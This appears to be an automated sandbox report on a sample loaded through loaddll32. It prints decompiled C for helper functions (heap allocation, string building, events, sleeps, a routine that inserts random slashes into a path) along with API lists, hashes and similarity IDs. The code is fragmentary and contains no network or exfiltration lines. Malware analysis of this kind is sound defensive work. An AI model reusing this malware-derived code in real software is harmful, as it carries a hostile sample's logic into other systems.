                                          0x00c75545
                                          0x00c75545
                                          0x00c7554c
                                          0x00000000
                                          0x00c7554e
                                          0x00c7554e
                                          0x00c7555b
                                          0x00000000
                                          0x00c7555b

                                          APIs
                                          • CreateEventA.KERNEL32(00C7D2A8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730), ref: 00C754FD
                                          • SetEvent.KERNEL32(00000000), ref: 00C7550A
                                          • Sleep.KERNEL32(00000BB8), ref: 00C75515
                                          • CloseHandle.KERNEL32(00000000), ref: 00C7551C
                                            • Part of subcall function 00C79575: WaitForSingleObject.KERNEL32(00000000,?,?,?,00C7553C,?,00C7553C,?,?,?,?,?,00C7553C,?), ref: 00C7964F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                          • String ID:
                                          • API String ID: 2559942907-0
                                          • Opcode ID: 07ff1814f24d53a560ea9239d176a82347717df35f57362b090ff6efd06c83dd
                                          • Instruction ID: 8e91508f92941c5cced8f4ab285fc28390a7a58cde151b829e602fdf1fca5056
                                          • Opcode Fuzzy Hash: 07ff1814f24d53a560ea9239d176a82347717df35f57362b090ff6efd06c83dd
                                          • Instruction Fuzzy Hash: 9B214572D00519EFCB50BFF5C8859AE77BAEF44350B05C429FA2AA7100DAB4DE418BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C74858, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E00C74858(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xc7d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xc7d250; // 0x2873e07d
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xc7d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                          0x00c74860
                                          0x00c74863
                                          0x00c74869
                                          0x00c74881
                                          0x00c74883
                                          0x00c74888
                                          0x00c7488a
                                          0x00c7488d
                                          0x00c7488f
                                          0x00c74892
                                          0x00c74894
                                          0x00c74894
                                          0x00c74896
                                          0x00c748a1
                                          0x00c748a6
                                          0x00c748b7
                                          0x00c748bf
                                          0x00c748c4
                                          0x00c748c7
                                          0x00c748ca
                                          0x00c748cc
                                          0x00c748cf
                                          0x00c748d2
                                          0x00c748d2
                                          0x00c748d5
                                          0x00c748e0
                                          0x00c748e5
                                          0x00c748ef

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00C74DBF,00000000,?,?,00C752FE,?,031395B0), ref: 00C74863
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00C7487B
                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,00C74DBF,00000000,?,?,00C752FE,?,031395B0), ref: 00C748BF
                                          • memcpy.NTDLL(00000001,?,00000001), ref: 00C748E0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: f89bd6053dc7c15e3f74bff7f10730b68c9a73297bfdc23b078d892a2b5ca7a6
                                          • Instruction ID: cfdd3a5d17bb3eba3801e2451eee7ea6fe67e266e776a428a22db01b9cee23c4
                                          • Opcode Fuzzy Hash: f89bd6053dc7c15e3f74bff7f10730b68c9a73297bfdc23b078d892a2b5ca7a6
                                          • Instruction Fuzzy Hash: 7911E372A00159ABC3148B69DC85E9EBBBEDB80350B05416AF509D7191E7709E4097A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C76AF7, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E00C76AF7(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E00C76F89(_t8, _t1);
				_t16 = E00C758BE(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E00C79038(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E00C758BE(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E00C7147E(_t16);
				}
				return _t18;
			}









                                          0x00c76b02
                                          0x00c76b03
                                          0x00c76b06
                                          0x00c76b08
                                          0x00c76b13
                                          0x00c76b17
                                          0x00c76b1c
                                          0x00c76b20
                                          0x00c76b28
                                          0x00c76b2d
                                          0x00c76b35
                                          0x00c76b35
                                          0x00c76b3e
                                          0x00c76b42
                                          0x00c76b48
                                          0x00c76b4b
                                          0x00c76b51
                                          0x00c76b51
                                          0x00c76b59
                                          0x00c76b59
                                          0x00c76b60
                                          0x00c76b60
                                          0x00c76b6b

                                          APIs
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                            • Part of subcall function 00C79038: wsprintfA.USER32 ref: 00C79094
                                          • lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,00C72098,74666F53,00000000,?,00C7D00C,?,?), ref: 00C76B2D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00C76B51
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00C76B59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                          • String ID: Soft
                                          • API String ID: 393707159-3753413193
                                          • Opcode ID: 514a7e2289cd0cf063028f8978ae645b236c1b6cb1509d043702e98e4e91a623
                                          • Instruction ID: 616168c99bac41bd6801cf5ff2dd1264abf406f2c85006c3e9c0557ab4e5c24b
                                          • Opcode Fuzzy Hash: 514a7e2289cd0cf063028f8978ae645b236c1b6cb1509d043702e98e4e91a623
                                          • Instruction Fuzzy Hash: D801D632500506BBCB122BA89CC8FEF3B6CDF85341F048029FA1C96142DB74CA45E7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C77283, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00C77283(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                          0x00c7728d
                                          0x00c77291
                                          0x00c772a6
                                          0x00c772a8
                                          0x00c772ad
                                          0x00c772b3
                                          0x00c772b5
                                          0x00c772ba
                                          0x00c772c5
                                          0x00c772bc
                                          0x00c772bc
                                          0x00c772bc
                                          0x00c772ba
                                          0x00c772d3

                                          APIs
                                          • memset.NTDLL ref: 00C77291
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 00C772A6
                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00C772B3
                                          • CloseHandle.KERNEL32(?), ref: 00C772C5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: CreateEvent$CloseHandlememset
                                          • String ID:
                                          • API String ID: 2812548120-0
                                          • Opcode ID: 98338d235a542bff178d6d610ab6fe5972730505b326cbd7284210b66daa4340
                                          • Instruction ID: 6744c7f69addd5c0866c9081a5cbe3a41c2fbc7650e113eac84fc1f2ffec24c6
                                          • Opcode Fuzzy Hash: 98338d235a542bff178d6d610ab6fe5972730505b326cbd7284210b66daa4340
                                          • Instruction Fuzzy Hash: 87F0FEB110430CFFD310AF66DCC4D2BBBACEB56298B118A2EF15692512D676A9055A70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C7A2EF, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 33stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E00C7A2EF(int __eax, char _a4) {
				void* _v0;
				void* _t12;
				int _t13;
				int _t14;

				_t1 =  &_a4; // 0x4d283a53
				_t14 = __eax;
				__imp__( *_t1);
				_t13 = __eax;
				if(__eax > __eax) {
					_t14 = __eax;
				}
				_t2 = _t14 + 1; // 0x1
				_t12 = E00C758BE(_t2);
				if(_t12 != 0) {
					memcpy(_t12, _v0, _t13);
					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
				}
				return _t12;
			}







                                          0x00c7a2f2
                                          0x00c7a2f6
                                          0x00c7a2f8
                                          0x00c7a2fe
                                          0x00c7a302
                                          0x00c7a304
                                          0x00c7a304
                                          0x00c7a306
                                          0x00c7a30f
                                          0x00c7a313
                                          0x00c7a31b
                                          0x00c7a32a
                                          0x00c7a32f
                                          0x00c7a337

                                          APIs
                                          • lstrlen.KERNEL32(S:(M,00000000,7748D3B0,?,00C79AA8,00000000,00000005,00C7D00C,00000008,?,?,59935A40,?,?,59935A40), ref: 00C7A2F8
                                          • memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,00C74A8B,?,?,?,4D283A53,?,?), ref: 00C7A31B
                                          • memset.NTDLL ref: 00C7A32A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpymemset
                                          • String ID: S:(M
                                          • API String ID: 4042389641-2217774225
                                          • Opcode ID: 258133517182dc1dff3fb2cd8d63d978e14e97fe0557844a639d583ef54b95e2
                                          • Instruction ID: 43757703e08c36556463d6f104e5509fca92eb831943df205c8cd6f76f3360ee
                                          • Opcode Fuzzy Hash: 258133517182dc1dff3fb2cd8d63d978e14e97fe0557844a639d583ef54b95e2
                                          • Instruction Fuzzy Hash: 74E0E573A052126BC730AAB95CC9E4F2A9DDBC4350B008429FA1983205E670CD0492B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C778AD, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00C778AD() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xc7d26c; // 0x3e0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xc7d2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xc7d26c; // 0x3e0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xc7d238; // 0x2d40000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                          0x00c778ad
                                          0x00c778b4
                                          0x00c778fe
                                          0x00c77900
                                          0x00c77900
                                          0x00c778b8
                                          0x00c778be
                                          0x00c778c3
                                          0x00c778c7
                                          0x00c778cd
                                          0x00c778d4
                                          0x00000000
                                          0x00000000
                                          0x00c778d6
                                          0x00c778db
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c778db
                                          0x00c778dd
                                          0x00c778e5
                                          0x00c778e8
                                          0x00c778e8
                                          0x00c778ee
                                          0x00c778f5
                                          0x00c778f8
                                          0x00c778f8
                                          0x00000000

                                          APIs
                                          • SetEvent.KERNEL32(000003E0,00000001,00C76F2D), ref: 00C778B8
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 00C778C7
                                          • CloseHandle.KERNEL32(000003E0), ref: 00C778E8
                                          • HeapDestroy.KERNEL32(02D40000), ref: 00C778F8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: CloseDestroyEventHandleHeapSleep
                                          • String ID:
                                          • API String ID: 4109453060-0
                                          • Opcode ID: cdf67590b961762be0ad7b021f6c943ae99349526c78bd2b500443e297fc03d7
                                          • Instruction ID: df7bf230e9ab0a9a86983a92dbc2740d3edfa39d81b677ba9c5fc5983f296f33
                                          • Opcode Fuzzy Hash: cdf67590b961762be0ad7b021f6c943ae99349526c78bd2b500443e297fc03d7
                                          • Instruction Fuzzy Hash: 24F08C31A09306D7D7105B34DD8CB0A3BA8AF05750B048215B82EE72E1CF20CD81D6A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C74C3A, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 50%
                                          			E00C74C3A(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0xc7d324; // 0x31395b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xc7d324; // 0x31395b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0xc7d030) {
					HeapFree( *0xc7d238, 0, _t8);
				}
				_t14[1] = E00C77C75(_v0, _t14);
				_t11 =  *0xc7d324; // 0x31395b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                          0x00c74c3a
                                          0x00c74c3a
                                          0x00c74c43
                                          0x00c74c53
                                          0x00c74c53
                                          0x00c74c58
                                          0x00c74c5d
                                          0x00000000
                                          0x00000000
                                          0x00c74c4d
                                          0x00c74c4d
                                          0x00c74c5f
                                          0x00c74c63
                                          0x00c74c75
                                          0x00c74c75
                                          0x00c74c85
                                          0x00c74c88
                                          0x00c74c8d
                                          0x00c74c91
                                          0x00c74c97

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(03139570), ref: 00C74C43
                                          • Sleep.KERNEL32(0000000A,?,?,?,00C74A8B,?,?,?,4D283A53,?,?), ref: 00C74C4D
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,00C74A8B,?,?,?,4D283A53,?,?), ref: 00C74C75
                                          • RtlLeaveCriticalSection.NTDLL(03139570), ref: 00C74C91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 8e05d9ad83e42f5c30b0ca061613ace04deb64e70acd4a3450ed43ad2e21369a
                                          • Instruction ID: 1ec59ed6f9365bac0f20921ea996a89cb2aa1ce721292ec1a7663e4e9a983908
                                          • Opcode Fuzzy Hash: 8e05d9ad83e42f5c30b0ca061613ace04deb64e70acd4a3450ed43ad2e21369a
                                          • Instruction Fuzzy Hash: 5DF0D470601241DBE72A9B79EE88B1E77F8AF24744F04C408F51FD6271DB20E981DB5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C79B10, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E00C79B10() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xc7d324; // 0x31395b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xc7d324; // 0x31395b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xc7d324; // 0x31395b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xc7e845) {
					HeapFree( *0xc7d238, 0, _t10);
					_t7 =  *0xc7d324; // 0x31395b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                          0x00c79b10
                                          0x00c79b19
                                          0x00c79b29
                                          0x00c79b29
                                          0x00c79b2e
                                          0x00c79b33
                                          0x00000000
                                          0x00000000
                                          0x00c79b23
                                          0x00c79b23
                                          0x00c79b35
                                          0x00c79b3a
                                          0x00c79b3e
                                          0x00c79b51
                                          0x00c79b57
                                          0x00c79b57
                                          0x00c79b60
                                          0x00c79b62
                                          0x00c79b66
                                          0x00c79b6c

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(03139570), ref: 00C79B19
                                          • Sleep.KERNEL32(0000000A,?,?,?,00C74A8B,?,?,?,4D283A53,?,?), ref: 00C79B23
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00C74A8B,?,?,?,4D283A53,?,?), ref: 00C79B51
                                          • RtlLeaveCriticalSection.NTDLL(03139570), ref: 00C79B66
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 8a5d1f92d03ee0836b5658a4ec79445beae364165191269d79d9f1857a626e05
                                          • Instruction ID: 3d91eff191ae3c16e7946e4471b6cad2be14dcdcd6ceacd8a5497db311b60829
                                          • Opcode Fuzzy Hash: 8a5d1f92d03ee0836b5658a4ec79445beae364165191269d79d9f1857a626e05
                                          • Instruction Fuzzy Hash: 03F06274600201DBEB289B65ED99F1D37F5EF59741B058118E90FD7270C630AD809A66
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C76B6E, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E00C76B6E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00C758BE(_t2);
				if(_t34 != 0) {
					_t30 = E00C758BE(_t28);
					if(_t30 == 0) {
						E00C7147E(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00C7A8D2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00C7A8D2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                          0x00c76b6e
                                          0x00c76b78
                                          0x00c76b7a
                                          0x00c76b80
                                          0x00c76b80
                                          0x00c76b89
                                          0x00c76b8d
                                          0x00c76b99
                                          0x00c76b9d
                                          0x00c76c11
                                          0x00c76b9f
                                          0x00c76b9f
                                          0x00c76ba3
                                          0x00c76ba8
                                          0x00c76bad
                                          0x00c76bc7
                                          0x00c76bb6
                                          0x00c76bb6
                                          0x00c76bba
                                          0x00c76bbd
                                          0x00c76bc2
                                          0x00c76bc2
                                          0x00c76bcc
                                          0x00c76bf4
                                          0x00c76bfa
                                          0x00c76bfd
                                          0x00c76bce
                                          0x00c76bd0
                                          0x00c76bd8
                                          0x00c76be3
                                          0x00c76be8
                                          0x00c76be8
                                          0x00c76c04
                                          0x00c76c0b
                                          0x00c76c0c
                                          0x00c76c0c
                                          0x00c76b9d
                                          0x00c76c1c

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,00C7A006,?,?,?,?,00000102,00C766AF,?,?,00000000), ref: 00C76B7A
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                            • Part of subcall function 00C7A8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00C76BA8,00000000,00000001,00000001,?,?,00C7A006,?,?,?,?,00000102), ref: 00C7A8E0
                                            • Part of subcall function 00C7A8D2: StrChrA.SHLWAPI(?,0000003F,?,?,00C7A006,?,?,?,?,00000102,00C766AF,?,?,00000000,00000000), ref: 00C7A8EA
                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00C7A006,?,?,?,?,00000102,00C766AF,?), ref: 00C76BD8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00C76BE8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00C76BF4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3767559652-0
                                          • Opcode ID: cfad7c657525b829f777426ca2205ecb492a7a4da8dc029fa7740953a155aac2
                                          • Instruction ID: bc4d4d4ffc91eda12fb28c33fbb0f33b18b6073d8e4ebc796644a21310d0f994
                                          • Opcode Fuzzy Hash: cfad7c657525b829f777426ca2205ecb492a7a4da8dc029fa7740953a155aac2
                                          • Instruction Fuzzy Hash: 4B21A2B2904656EFCB125FB5CC85AAE7FA8DF06380B15C054F94C9B212D771CA40A7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C75FCB, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00C75FCB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00C758BE(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                          0x00c75fe0
                                          0x00c75fe4
                                          0x00c75fee
                                          0x00c75ff3
                                          0x00c75ff8
                                          0x00c75ffa
                                          0x00c76002
                                          0x00c76007
                                          0x00c76015
                                          0x00c7601a
                                          0x00c76024

                                          APIs
                                          • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,0313937C,?,00C7694E,004F0053,0313937C,?,?,?,?,?,?,00C79C10), ref: 00C75FDB
                                          • lstrlenW.KERNEL32(00C7694E,?,00C7694E,004F0053,0313937C,?,?,?,?,?,?,00C79C10), ref: 00C75FE2
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,00C7694E,004F0053,0313937C,?,?,?,?,?,?,00C79C10), ref: 00C76002
                                          • memcpy.NTDLL(751469A0,00C7694E,00000002,00000000,004F0053,751469A0,?,?,00C7694E,004F0053,0313937C), ref: 00C76015
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
